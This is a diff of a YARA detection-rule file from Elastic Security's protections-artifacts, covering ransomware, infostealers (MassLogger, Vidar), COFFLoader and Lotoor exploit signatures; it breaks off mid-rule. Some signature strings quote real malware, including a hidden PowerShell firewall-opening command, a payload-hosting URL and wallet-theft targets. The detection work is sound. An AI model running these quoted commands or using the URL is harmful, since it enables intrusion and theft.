"460b21638f200bf909e9e47bc716acfcb323540fbaa9ea9d0196361696ffa294" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -58315,2019 +59239,2053 @@ rule ELASTIC_Windows_Ransomware_Helloxd_0C50F01B : FILE MEMORY os = "windows" strings: - $mutex = "With best wishes And good intentions..." - $ransomnote0 = ":: our TOX below >:)" - $ransomnote1 = "You can download TOX here" - $ransomnote2 = "...!XD ::" - $productname = "HelloXD" ascii wide - $legalcopyright = "uKn0w" ascii wide - $description = "VhlamAV" ascii wide - $companyname = "MicloZ0ft" ascii wide + $a1 = "https://*:443/ews/MsExgHealthCheckd/" ascii wide + $a2 = "FillFromEncodedBytes" ascii wide + $a3 = "Exception caught" ascii wide + $a4 = "text/html; charset=utf-8" ascii wide + $a5 = ".Run" ascii wide + $a6 = "sdafwe3rwe23" ascii wide condition: - ($mutex and all of ($ransomnote*)) or (3 of ($productname,$legalcopyright,$description,$companyname)) + 5 of them } -rule ELASTIC_Linux_Generic_Threat_A658B75F : FILE MEMORY +rule ELASTIC_Windows_Trojan_Masslogger_511B001E : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Windows Trojan Masslogger (Windows.Trojan.MassLogger)" author = "Elastic Security" - id = "a658b75f-3520-4ec6-b3d4-674bc22380b3" - date = "2024-01-17" - modified = "2024-02-13" + id = "511b001e-dc67-4e45-9096-0b01101ca0ab" + date = "2022-03-02" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "df430ab9f5084a3e62a6c97c6c6279f2461618f038832305057c51b441c648d9" - logic_hash = "1ef7267438b8d15ed770f0784a7d428cbc2680144b0ef179337875d5b4038d08" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_MassLogger.yar#L1-L24" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "177875c756a494872c516000beb6011cec22bd9a73e58ba6b2371dba2ab8c337" + logic_hash = "5abac5e32e55467710842e19c25cab5c7f1cdb0f8a68fb6808d54467c69ebdf6" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "112be9d42b300ce4c2e0d50c9e853d3bdab5d030a12d87aa9bae9affc67cd6cd" - severity = 50 + fingerprint = "14ec9c32af7c1dd4a1f73e37ef9e042c18d9e0179b0e5732752767f93be6d4e2" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = { 6D 61 69 6E 2E 45 6E 63 72 79 70 74 46 69 6C 65 52 65 61 64 57 72 69 74 65 } - $a2 = { 6D 61 69 6E 2E 53 63 61 6E 57 61 6C 6B 65 72 } + $a1 = "ExecutionPolicy Bypass -WindowStyle Hidden -Command netsh advfirewall firewall add rule name='allow RemoteDesktop' dir=in protoc" wide + $a2 = "https://raw.githubusercontent.com/lisence-system/assemply/main/VMprotectEncrypt.jpg" wide fullword + $a3 = "ECHO $SMTPServer = smtp.gmail.com >> %PSScript%" wide fullword + $a4 = "Injecting Default Template...." wide fullword + $a5 = "GetVncLoginMethodAsync" ascii fullword + $a6 = "/c start computerdefaults.exe" wide fullword condition: all of them } -rule ELASTIC_Linux_Generic_Threat_Ea5Ade9A : FILE MEMORY +rule ELASTIC_Windows_Trojan_Vidar_9007Feb2 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Windows Trojan Vidar (Windows.Trojan.Vidar)" author = "Elastic Security" - id = "ea5ade9a-101e-49df-b0e8-45a04320950b" - date = "2024-01-17" - modified = "2024-02-13" + id = "9007feb2-6ad1-47b6-bae2-3379d114e4f1" + date = "2021-06-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L22-L40" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d75189d883b739d9fe558637b1fab7f41e414937a8bae7a9d58347c223a1fcaa" - logic_hash = "12a9b5e54d6d528ecb559b6e2ea3aa72effa7f0efbf2c33581a4efedc292e4c1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Vidar.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec" + logic_hash = "fcdef7397f17ee402155e526c6fa8b51f3ea96e203a095b0b4c36cb7d3cc83d1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "fedf3b94c22a1dab3916b7bc6a1b88768c0debd6d628b78d8a6610b636f3c652" - severity = 50 + fingerprint = "8416b14346f833264e32c63253ea0b0fe28e5244302b2e1b266749c543980fe2" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = { 55 89 E5 53 8B 5D 08 B8 0D 00 00 00 CD 80 8B 5D FC 89 EC 5D C3 55 89 E5 53 8B 5D 08 B8 2D 00 00 00 CD 80 8B 5D FC 89 EC 5D C3 55 89 E5 53 8B 5D 08 8B 4D 0C B8 6C 00 00 00 CD 80 8B 5D FC 89 EC } + $a = { E8 53 FF D6 50 FF D7 8B 45 F0 8D 48 01 8A 10 40 3A D3 75 F9 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_80Aea077 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Vidar_114258D5 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Windows Trojan Vidar (Windows.Trojan.Vidar)" author = "Elastic Security" - id = "80aea077-c94f-4c95-83a5-967cc16df2a8" - date = "2024-01-17" - modified = "2024-02-13" + id = "114258d5-f05e-46ac-914b-1a7f338ccf58" + date = "2021-06-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L42-L60" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "002827c41bc93772cd2832bc08dfc413302b1a29008adbb6822343861b9818f0" - logic_hash = "cab860ad5f0c49555adb845504acb4dbeabb94dbc287202be35020e055e6f27b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Vidar.yar#L21-L44" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec" + logic_hash = "9ea3ea0533d14edd0332fa688497efd566a890d1507214fc8591a0a11433d060" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "702953af345afb999691906807066d58b9ec055d814fc6fe351e59ac5193e31f" - severity = 50 + fingerprint = "9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = { 38 49 89 FE 0F B6 0E 48 C1 E1 18 0F B6 6E 01 48 C1 E5 10 48 09 E9 0F B6 6E 03 48 09 E9 0F B6 6E 02 48 C1 E5 08 48 09 CD 0F B6 56 04 48 C1 E2 18 44 0F B6 7E 05 49 C1 E7 10 4C 09 FA 44 } + $a1 = "BinanceChainWallet" fullword + $a2 = "*wallet*.dat" fullword + $a3 = "SOFTWARE\\monero-project\\monero-core" fullword + $b1 = "CC\\%s_%s.txt" fullword + $b2 = "History\\%s_%s.txt" fullword + $b3 = "Autofill\\%s_%s.txt" fullword condition: - all of them + 1 of ($a*) and 1 of ($b*) } -rule ELASTIC_Linux_Generic_Threat_2E214A04 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Vidar_32Fea8Da : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Windows Trojan Vidar (Windows.Trojan.Vidar)" author = "Elastic Security" - id = "2e214a04-43a4-4c26-8737-e089fbf6eecd" - date = "2024-01-17" - modified = "2024-02-13" + id = "32fea8da-b381-459c-8bf4-696388b8edcc" + date = "2023-05-04" + modified = "2023-06-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L62-L81" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "cad65816cc1a83c131fad63a545a4bd0bdaa45ea8cf039cbc6191e3c9f19dead" - logic_hash = "0d29aa6214b0a05f9af10cdc080ffa33452156e13c057f31997630cebcda294a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Vidar.yar#L46-L66" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6f5c24fc5af2085233c96159402cec9128100c221cb6cb0d1c005ced7225e211" + logic_hash = "1a18cdc3bd533c34eb05b239830ecec418dc76ee9f4fcfc48afc73b07d55b3cd" score = 75 - quality = 71 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "0937f7c5bcfd6f2b327981367684cff5a53d35c87eaa360e90afc9fce1aec070" - severity = 50 + fingerprint = "ebcced7b2924cc9cfe9ed5b5f84a8959e866a984f2b5b6e1ec5b1dd096960325" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = { 49 6E 73 65 72 74 20 76 69 63 74 69 6D 20 49 50 3A 20 } - $a2 = { 49 6E 73 65 72 74 20 75 6E 75 73 65 64 20 49 50 3A 20 } + $a1 = { 4F 4B 58 20 57 65 62 33 20 57 61 6C 6C 65 74 } + $a2 = { 8B E5 5D C3 5E B8 03 00 00 00 5B 8B E5 5D C3 5E B8 08 00 00 } + $a3 = { 83 79 04 00 8B DE 74 08 8B 19 85 DB 74 62 03 D8 8B 03 85 C0 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_0B770605 : FILE MEMORY +rule ELASTIC_Macos_Infostealer_Mdquerytcc_142313Cb : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Macos Infostealer Mdquerytcc (MacOS.Infostealer.MdQueryTCC)" author = "Elastic Security" - id = "0b770605-db33-4028-b186-b1284da3e3fe" - date = "2024-01-17" - modified = "2024-02-13" + id = "142313cb-4726-442d-957c-5078440b8940" + date = "2023-04-11" + modified = "2024-08-19" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L83-L102" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "99418cbe1496d5cd4177a341e6121411bc1fab600d192a3c9772e8e6cd3c4e88" - logic_hash = "d4aae755870765a119ee7ae648d4388e0786e8ab6f7f196d81c6356be7d0ddfb" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Infostealer_MdQueryTCC.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d895075057e491b34b0f8c0392b44e43ade425d19eaaacea6ef8c5c9bd3487d8" + logic_hash = "e00015867ad0a0c440a49364945fe828d50675ecfd2039028653d97c77cff323" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "d771f9329fec5e70b515512b58d77bb82b3c472cd0608901a6e6f606762d2d7e" - severity = 50 - arch_context = "x86" + fingerprint = "280fa2c49461d0b53425768b9114696104c3ed0241ed157c22e36cdbaa334ac9" + severity = 100 + arch_context = "x86, arm64" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a1 = { 68 65 79 20 73 63 61 6E 20 72 65 74 61 72 64 } - $a2 = { 5B 62 6F 74 70 6B 74 5D 20 43 6F 6D 6D 69 74 74 69 6E 67 20 53 75 69 63 69 64 65 } + $string1 = { 6B 4D 44 49 74 65 6D 44 69 73 70 6C 61 79 4E 61 6D 65 20 ( 3D | 3D ) 20 2A 54 43 43 2E 64 62 } condition: - all of them + any of them } -rule ELASTIC_Linux_Generic_Threat_92064B27 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Coffloader_81Ba13B8 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Windows Hacktool Coffloader (Windows.Hacktool.COFFLoader)" author = "Elastic Security" - id = "92064b27-f1c7-4b86-afc9-3dcfab69fe0d" - date = "2024-01-17" - modified = "2024-02-13" + id = "81ba13b8-8994-4fe9-98e5-44514c554e8b" + date = "2024-04-22" + modified = "2024-05-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L104-L122" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8e5cfcda52656a98105a48783b9362bad22f61bcb6a12a27207a08de826432d9" - logic_hash = "adb9ed7280065f77440bd1e106bc800ebe6251119151cd54b76dc2917b013f65" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_COFFLoader.yar#L1-L43" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c2e03659eb1594dc958e01344cfa9ba126d66736b089db5e3dd1b1c3e3e7d2f7" + logic_hash = "d4f061af200a0ae9f3276fd6dfcb09ecdf662f29b7c43ea47c69a53d9fe66793" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "7a465615646184f5ab30d9b9b286f6e8a95cfbfa0ee780915983ec1200fd2553" - severity = 50 + fingerprint = "ef9f11d9cd6c3b46f7d13ea039dcad6fa24515495466b1102ec8c1c8bed8853e" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = { 55 89 E5 53 8B 4D 10 8B 5D 08 85 C9 74 0D 8A 55 0C 31 C0 88 14 18 40 39 C1 75 F8 5B 5D C3 90 90 55 89 E5 8B 4D 08 8B 55 0C 85 C9 74 0F 85 D2 74 0B 31 C0 C6 04 08 00 40 39 C2 75 F7 5D C3 90 90 } + $a1 = "BeaconDataParse" ascii fullword + $a2 = "BeaconDataInt" ascii fullword + $a3 = "BeaconDataShort" ascii fullword + $a4 = "BeaconDataLength" ascii fullword + $a5 = "BeaconDataExtract" ascii fullword + $a6 = "BeaconFormatAlloc" ascii fullword + $a7 = "BeaconFormatReset" ascii fullword + $a8 = "BeaconFormatFree" ascii fullword + $a9 = "BeaconFormatAppend" ascii fullword + $a10 = "BeaconFormatPrintf" ascii fullword + $a11 = "BeaconFormatToString" ascii fullword + $a12 = "BeaconFormatInt" ascii fullword + $a13 = "BeaconPrintf" ascii fullword + $a14 = "BeaconOutput" ascii fullword + $a15 = "BeaconUseToken" ascii fullword + $a16 = "BeaconRevertToken" ascii fullword + $a17 = "BeaconDataParse" ascii fullword + $a18 = "BeaconIsAdmin" ascii fullword + $a19 = "BeaconGetSpawnTo" ascii fullword + $a20 = "BeaconSpawnTemporaryProcess" ascii fullword + $a21 = "BeaconInjectProcess" ascii fullword + $a22 = "BeaconInjectTemporaryProcess" ascii fullword + $a23 = "BeaconCleanupProcess" ascii fullword + $b1 = "COFFLoader.x64.dll" + $b2 = "COFFLoader.x86.dll" condition: - all of them + 5 of ($a*) or 1 of ($b*) } -rule ELASTIC_Linux_Generic_Threat_De6Be095 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Lotoor_03C81Bd9 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" author = "Elastic Security" - id = "de6be095-93b6-45da-b9e2-682cea7a6488" - date = "2024-01-17" - modified = "2024-02-13" + id = "03c81bd9-c7d1-4044-9cce-951637b2b523" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L124-L143" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2431239d6e60ca24a5440e6c92da62b723a7e35c805f04db6b80f96c8cf9fee6" - logic_hash = "cbd7578830169703b047adb1785b05d226f2507a65c203ee344d8e2b3a24f6c9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Lotoor.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3fc701a2caab0297112501f55eaeb05264c5e4099c411dcadc7095627e19837a" + logic_hash = "dc2dfa128f509221cae8bae9864190e8316bb7a5ae081da1076081b5f4fdc870" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "8f2d682401b4941615ecdc8483ff461c86a12c585483e00d025a1b898321a585" - severity = 50 + fingerprint = "329dc1e21088c87095ee030c597a3340f838c338403ae64aec574e0086281461" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 2D 2D 66 61 72 6D 2D 66 61 69 6C 6F 76 65 72 } - $a2 = { 2D 2D 73 74 72 61 74 75 6D 2D 66 61 69 6C 6F 76 65 72 } + $a = { 65 00 65 78 70 5F 73 74 61 74 65 00 6D 65 6D 73 65 74 00 70 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_898D9308 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Lotoor_757637D9 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" author = "Elastic Security" - id = "898d9308-86d1-4b73-ae6c-c24716466f60" - date = "2024-01-18" - modified = "2024-02-13" + id = "757637d9-6171-4e2a-bf7c-3ee2c71066a7" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L145-L164" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ce89863a16787a6f39c25fd15ee48c4d196223668a264217f5d1cea31f8dc8ef" - logic_hash = "8b5deedf18d660d0b76dc987843ff5cc01432536a04ab4925e9b08269fd847e4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Lotoor.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0762fa4e0d74e3c21b2afc8e4c28e2292d1c3de3683c46b5b77f0f9fe1faeec7" + logic_hash = "b1f1784aae5958740d03ca50d0b9731e8db7d86d918d16e82cf6fc1e1bf663a9" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "fe860a6283aff8581b73440f9afbd807bb03b86dd9387b0b4ee5842a39ed7b03" - severity = 50 + fingerprint = "7fa3e2432ddd696b5d40aafbde1e026e74294d31c9201800ce66b343a3724c6e" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 65 63 66 61 66 65 61 62 36 65 65 37 64 36 34 32 } - $a2 = { 3D 3D 3D 3D 65 6E 64 20 64 75 6D 70 20 70 6C 75 67 69 6E 20 69 6E 66 6F 3D 3D 3D 3D } + $a = { 64 00 73 70 72 69 6E 74 66 00 6F 70 65 6E 00 69 73 5F 6F 6C } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_23D54A0E : FILE MEMORY +rule ELASTIC_Linux_Exploit_Lotoor_78543893 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" author = "Elastic Security" - id = "23d54a0e-f2e2-443e-832c-d57146350eb6" - date = "2024-01-18" - modified = "2024-02-13" + id = "78543893-7180-4857-8951-4190ca4602f1" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L166-L185" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a2b54f789a1c4cbed13e0e2a5ab61e0ce5bb42d44fe52ad4b7dd3da610045257" - logic_hash = "7e52eaf9c49bd6cbdb89b0c525b448864e1ea55d00bc052898613174fe5956cc" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Lotoor.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ff5b02d2b4dfa9c3d53e7218533f3c57e82315be8f62aa17e26eda55a3b53479" + logic_hash = "4bb6a6e063fd00569b04f4514ec1731357aa8e8ce4cfee354fdd86773a4358da" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "4ff521192e2061af868b9403479680fd77d1dc71f181877a36329f63e91b7c66" - severity = 50 + fingerprint = "b581e0820d7895021841d67e4e9dc40cec8f5ae5ba4dbc0585abcb76f97c9a2f" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 29 2B 2F 30 31 3C 3D 43 4C 4D 50 53 5A 5B } - $a2 = { 61 64 78 61 65 73 61 76 78 62 69 6E 63 67 6F 64 69 72 64 6E 73 65 6E 64 66 69 6E 66 6D 61 66 74 70 67 63 20 67 70 20 69 6E 20 69 6E 74 6D 61 70 6E 69 6C 6F 62 6A 70 63 3D 70 74 72 73 65 74 73 68 61 73 73 68 74 63 70 75 64 70 } + $a = { 00 48 8B 48 08 48 8B 54 24 F0 48 63 C6 48 89 8C C2 88 00 00 00 83 44 24 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_D7802B0A : FILE MEMORY +rule ELASTIC_Linux_Exploit_Lotoor_4F8D83D2 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" author = "Elastic Security" - id = "d7802b0a-2286-48c8-a0b5-96af896b384e" - date = "2024-01-18" - modified = "2024-02-13" + id = "4f8d83d2-4f7b-4a55-9d08-f7bc84263302" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L187-L205" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a2b54f789a1c4cbed13e0e2a5ab61e0ce5bb42d44fe52ad4b7dd3da610045257" - logic_hash = "3e1452204fef11d63870af5f143ae73f4b8e5a4db83a53851444fbf8a0ea6a26" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Lotoor.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d78128eca706557eeab8a454cf875362a097459347ddc32118f71bd6c73d5bbd" + logic_hash = "6fee488d97fe1d4be558b6886c603010c6d1423a750783b38a65d2fb3eeb76f4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "105112354dea4db98d295965d4816c219b049fe7b8b714f8dc3d428058a41a32" - severity = 50 + fingerprint = "1a4e2746eb1da2a841c08ea44c6d0476c02dae5b4fbbe17926433bdb8c4e6df5" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 48 81 EC 88 00 00 00 48 89 AC 24 80 00 00 00 48 8D AC 24 80 00 00 00 49 C7 C5 00 00 00 00 4C 89 6C 24 78 88 8C 24 A8 00 00 00 48 89 9C 24 A0 00 00 00 48 89 84 24 98 00 00 00 C6 44 24 27 00 90 } + $a = { 00 75 6E 61 6D 65 00 73 74 64 6F 75 74 00 66 77 72 69 74 65 00 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_08E4Ee8C : FILE MEMORY +rule ELASTIC_Linux_Exploit_Lotoor_F4Afd230 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" author = "Elastic Security" - id = "08e4ee8c-4dfd-4bb8-9406-dce6fb7bc9ee" - date = "2024-01-18" - modified = "2024-02-13" + id = "f4afd230-6c9f-49e8-8f13-429635b38eb5" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L207-L225" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "35eeba173fb481ac30c40c1659ccc129eae2d4d922e27cf071047698e8d95aea" - logic_hash = "a927415afbab32adee49a583fc35bc3d44764f87bbbb3497b38af6feb92cd9a8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Lotoor.yar#L81-L99" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "805e900ffc9edb9f550dcbc938a3b06d28e9e7d3fb604ff68a311a0accbcd2b1" + logic_hash = "9aba4ebbf946f07071bfb94fa50c6981ae8c659aca9ee6e05c7ef214432d7466" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "5e71d8515def09e95866a08951dd06bb84d327489f000e1c2326448faad15753" - severity = 50 + fingerprint = "1709244fdc1e2d9d7fba01743b0cf87de7b940d2b25a0016e021b7e9696525bc" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 78 63 72 79 70 74 6F 67 72 61 70 68 79 2D 32 2E 31 2E 34 2D 70 79 32 2E 37 2E 65 67 67 2D 69 6E 66 6F 2F 50 4B 47 2D 49 4E 46 4F } + $a = { 83 20 FF FF FF 85 C0 74 25 8B 83 F8 FF FF FF 85 C0 74 1B 83 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_D60E5924 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Lotoor_Bb384Bc9 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" author = "Elastic Security" - id = "d60e5924-c216-4780-ba61-101abfd94b9d" - date = "2024-01-18" - modified = "2024-02-13" + id = "bb384bc9-fcda-4ad4-82ad-b95de750d31c" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L227-L246" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fdcc2366033541053a7c2994e1789f049e9e6579226478e2b420ebe8a7cebcd3" - logic_hash = "012111e4a38c1f901dcd830cc26ef8dcfbde7986fcc8b8eebddb8d8b7a0cec6a" + source_url = 